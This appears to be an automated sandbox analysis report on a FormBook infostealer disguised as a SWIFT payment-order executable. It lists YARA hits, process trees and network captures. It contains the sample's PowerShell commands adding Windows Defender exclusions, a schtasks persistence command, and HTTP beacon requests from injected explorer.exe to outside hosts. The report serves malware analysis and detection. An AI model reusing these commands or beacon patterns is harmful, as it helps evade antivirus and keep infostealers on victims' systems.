                                                          Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c
                                                          Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:col


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          2192.168.2.54978434.102.136.18080C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Nov 25, 2021 17:31:56.469037056 CET7503OUTGET /46uq/?3fQ0Khi=bs9J1aeGn7//rC5/XQ3RZfL5fo+K3BeziJUGIjAdanx1gP9H8FkBLk3VYXo90D5B+GRs&j0=SFN8Rxuh3 HTTP/1.1
                                                          Host: www.hpsaddlerock.com
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Nov 25, 2021 17:31:56.587014914 CET7504INHTTP/1.1 403 Forbidden
                                                          Server: openresty
                                                          Date: Thu, 25 Nov 2021 16:31:56 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 275
                                                          ETag: "618be761-113"
                                                          Via: 1.1 google
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                          3192.168.2.549786209.17.116.16380C:\Windows\explorer.exe
                                                          TimestampkBytes transferredDirectionData
                                                          Nov 25, 2021 17:32:04.898037910 CET7779OUTGET /46uq/?j0=SFN8Rxuh3&3fQ0Khi=IBlQMs5j29CKqlv3/eZQ6Z47udTwmev2IX+bwOiN2E8lumQwhRgtDV6FzU7U1t+cHC/Y HTTP/1.1
                                                          Host: www.aarondecker.online
                                                          Connection: close
                                                          Data Raw: 00 00 00 00 00 00 00
                                                          Data Ascii:
                                                          Nov 25, 2021 17:32:05.017940044 CET7781INHTTP/1.1 400 Bad Request
                                                          Server: openresty/1.17.8.2
                                                          Date: Thu, 25 Nov 2021 16:32:04 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 163
                                                          Connection: close
                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 39 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                          Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty/1.19.9.1</center></body></html>


                                                          Code Manipulations

                                                          Statistics

                                                          Behavior

                                                          Click to jump to process

                                                          System Behavior

                                                          General

                                                          Start time:17:30:02
                                                          Start date:25/11/2021
                                                          Path:C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe"
                                                          Imagebase:0x7e0000
                                                          File size:669184 bytes
                                                          MD5 hash:FFF91C58119D3CD7F68457E8565F7116
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.263971290.0000000003C7D000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.264376295.0000000003EE5000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.263450761.0000000002C71000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmp, Author: Joe Security
                                                          Reputation:low

                                                          General

                                                          Start time:17:30:07
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          Imagebase:0xac0000
                                                          File size:430592 bytes
                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:08
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecfc0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:10
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AnsPejV.exe
                                                          Imagebase:0xac0000
                                                          File size:430592 bytes
                                                          MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:10
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecfc0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:11
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AnsPejV" /XML "C:\Users\user\AppData\Local\Temp\tmp3FD.tmp
                                                          Imagebase:0x1010000
                                                          File size:185856 bytes
                                                          MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:13
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\System32\conhost.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                          Imagebase:0x7ff7ecfc0000
                                                          File size:625664 bytes
                                                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:15
                                                          Start date:25/11/2021
                                                          Path:C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exe
                                                          Imagebase:0x7ff797770000
                                                          File size:669184 bytes
                                                          MD5 hash:FFF91C58119D3CD7F68457E8565F7116
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.352931586.0000000000F20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.257794337.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.353085483.0000000001360000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.256828803.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.352440743.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:low

                                                          General

                                                          Start time:17:30:20
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\explorer.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\Explorer.EXE
                                                          Imagebase:0x7ff693d90000
                                                          File size:3933184 bytes
                                                          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.310910025.000000000E481000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.291860660.000000000E481000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:high

                                                          General

                                                          Start time:17:30:58
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\autochk.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:C:\Windows\SysWOW64\autochk.exe
                                                          Imagebase:0x1220000
                                                          File size:871424 bytes
                                                          MD5 hash:34236DB574405291498BCD13D20C42EB
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:moderate

                                                          General

                                                          Start time:17:30:59
                                                          Start date:25/11/2021
                                                          Path:C:\Windows\SysWOW64\help.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Windows\SysWOW64\help.exe
                                                          Imagebase:0xd90000
                                                          File size:10240 bytes
                                                          MD5 hash:09A715036F14D3632AD03B52D1DA6BFF
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.504518924.0000000000C00000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.501501248.00000000006B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, Author: Joe Security
                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.501943863.0000000000900000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                          Reputation:moderate

                                                          Disassembly

                                                          Code Analysis

                                                          Reset < >